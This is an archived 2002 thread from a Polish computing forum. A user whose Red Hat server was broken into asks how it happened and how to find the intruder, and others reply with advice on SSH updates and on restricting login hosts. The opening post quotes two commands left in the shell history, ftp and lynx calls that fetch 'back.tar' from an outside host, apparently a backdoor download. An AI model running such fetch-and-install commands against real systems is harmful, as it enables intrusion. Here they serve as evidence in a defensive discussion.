Twoje PC  
Zarejestruj się na Twoje PC
TwojePC.pl | PC | Komputery, nowe technologie, recenzje, testy
B O A R D
   » Board
 » Zadaj pytanie
 » Archiwum
 » Szukaj
 » Stylizacja

 
M E N U
  0
 » Nowości
0
 » Archiwum
0
 » Recenzje / Testy
0
 » Board
0
 » Rejestracja
0
0
 
Szukaj @ TwojePC
 

w Newsach i na Boardzie
 
OBECNI NA TPC
 
 » Magnus 13:25
 » JE Jacaw 13:23
 » Liu CAs 13:19
 » Qjanusz 13:19
 » DYD 13:13
 » rkowalcz 13:03
 » PaKu 13:03
 » Kenny 12:59
 » R_I_P_ 12:44
 » rho 12:42
 » El Vis 12:40
 » dulik 12:39
 » rooter666 12:33
 » PiotrexP 12:32
 » Gakudini 12:32
 » KHot 12:30
 » rrafaell 12:30
 » waski 12:29
 » Zbyl 12:26
 » Menah 12:14

 Dzisiaj przeczytano
 41103 postów,
 wczoraj 25974

 Szybkie ładowanie
 jest:
włączone.

 
ccc
TwojePC.pl © 2001 - 2024
A R C H I W A L N A   W I A D O M O Ś Ć
    

Miałem włamanie na serwer - jak rozpoznac delikwenta??? , kaszpio 16/11/02 22:20
Dzis rano wlaczam kompa i nie ma neta...wchodze przez ssh na serwer i patrze ze caly moj katalog domowy jest wyczyszczony a takze cala zawartosc www...
Wszystkie logi typu latlog i messages sa wyrzucone...
W konsoli zapamietaly sie takie dwie ostatnie komendy:
ftp mr-bomb.org
lynx www.mr-bomb.org/back.tar
ktorych ja i nikt inny na pewno nie wpisywal...
co sie stalo i co zawiodlo???
Uslugi ktore mam na serwie to ssh, postfix, www, samba, squid...
dostep dla wszystkich byl tylko dla ssh i ipop3d...
jak to mozliwe zeby ktos tak namieszal?
I jak teraz rozpoznac delikwenta...jak nie ma tych logow?
System to rh70 i ipchains

Toshiba Tecra S11-124

  1. jak nic ktos wszedl przez ssh... , Holek 16/11/02 22:28
    udez na gg 585224 to moze cos wykombinujemy - jak zwykle jestem na "czuwaniu", ale wal smialo

    "...here I am on The Road again..."

  2. zawieść mogło wszystko... jedyna rada to bardzo częste , Bart 16/11/02 22:39
    aktualizacje, a ssh dołanczane do RH i tym podobnych jest g... warte.

    1. ssh... , Holek 16/11/02 22:45
      ostatnio w ogole jest ch... warte. Nic tylko siedzic buqtrak i na biezaca wprowadzac mu zmiany w conf... i aktualizowac ;)

      a czy to RH, czy Slack, czy inny Debian - wszystko jedno g... skoro ssh g...

      isnt it ?:)

      "...here I am on The Road again..."

      1. SSH? , Poke 16/11/02 22:52
        Widze ze o czyms nie wiem, dlaczego ssh g... warte? Kurcze, jak bede musial wylaczyc ssh to jak mam zdalnie pracowac?

        09 sierpien 2008 - penitentiam agite

        1. ja tez nie wiem... , kaszpio 16/11/02 22:53
          ale na razie odcinam serwer od swiata!;-)

          Toshiba Tecra S11-124

          1. Niepotrzebnie , Yatanza 16/11/02 22:58
            oni juz tego wiecej nie zrobia. Postaw sobie nowy serverek, baw sie dalej i daj spokoj z namierzaniem, bo szkoda czasu.

            1. jacy oni? , kaszpio 16/11/02 23:13
              znasz ich?;-)

              Toshiba Tecra S11-124

    2. jezeli go...warte ... , kaszpio 16/11/02 22:55
      to czego uzywac do komunikacji z serwerem w necie?

      Toshiba Tecra S11-124

      1. używać komercyjnych, dobrych i bezpiecznych wersji SSH. , Bart 16/11/02 23:15
        j.w.

        1. eee tam... , Holek 16/11/02 23:35
          od razu komercyjnych, uzywam openssh od dawna i zero problemow...

          1. czytac buqtrak
          3. stosowac to co tam zalecaja zaraz po przeczytaniu
          3. goto 1

          "...here I am on The Road again..."

  3. a nie lepiej... , XTC 17/11/02 00:15
    zastanowić się skąd chcemy się logować i zablokować ssh dla "wszystkich innych" ??? ... kusić tak nie będzie...

    Linux

    1. Dobrze gada!! , guma 17/11/02 00:51
      Dac mu wodki :))

      Oczywiscie nalezy ograczniczyc hosty z ktorych mozemy sie logowac, to wystarcza na 99,99% wlamow. A z reszta to juz radzic sobie trzeba inaczej.

      pozdrawiam

  4. noo... nie mowcie... , capri 17/11/02 01:10
    ze ktos sie na super_extra_zabezpieczonego linuxa wdarl...

    Quidquid latine dictum sit,
    altum videtur

    1. ale nie mowimy przeciez... , Holek 17/11/02 01:35
      ze na super extra zabezpieczonego ;)

      "...here I am on The Road again..."

      1. hehe pewno, że nie.. , Maverick 17/11/02 03:25
        bo takowego nie ma :)

    2. hmm.. nie ... , XCLONE 17/11/02 09:02
      ktos sie wdarl na super_extra_NIE_zabezpieczonego linux :p
      moj firewall moze sluzyc jako calkiem niezly wzorzec ... :>
      dziwactwa sie dobijaja ... ale jeszcze nic go nie zaatakowalo na pada .. :> (tu wazelinka dla mastaha z Krakowa, ktory pomaga mi ustawiac takowe brameczki) :>>

      Pozdr.
      Artur S.

      The World HAS Changed..
      :P

      1. co tu ma wspolnego z tym firewall?!?! , kaszpio 17/11/02 09:14
        poprostu wpuszczal wszystkich na porcie 22...sa zrobione konta shellowe...i nie wiem jak wyobrazasz sobie prace bez tego portu...
        A zawiodlo przez moja glupote...bo myslalem ze jak mam ssh to juz ok...a tu go..no...trzeba ciagle latac dziurki i uzywac only protocol 2!;-)
        Pozdrowka!

        Toshiba Tecra S11-124

    
All rights reserved ® Copyright and Design 2001-2024, TwojePC.PL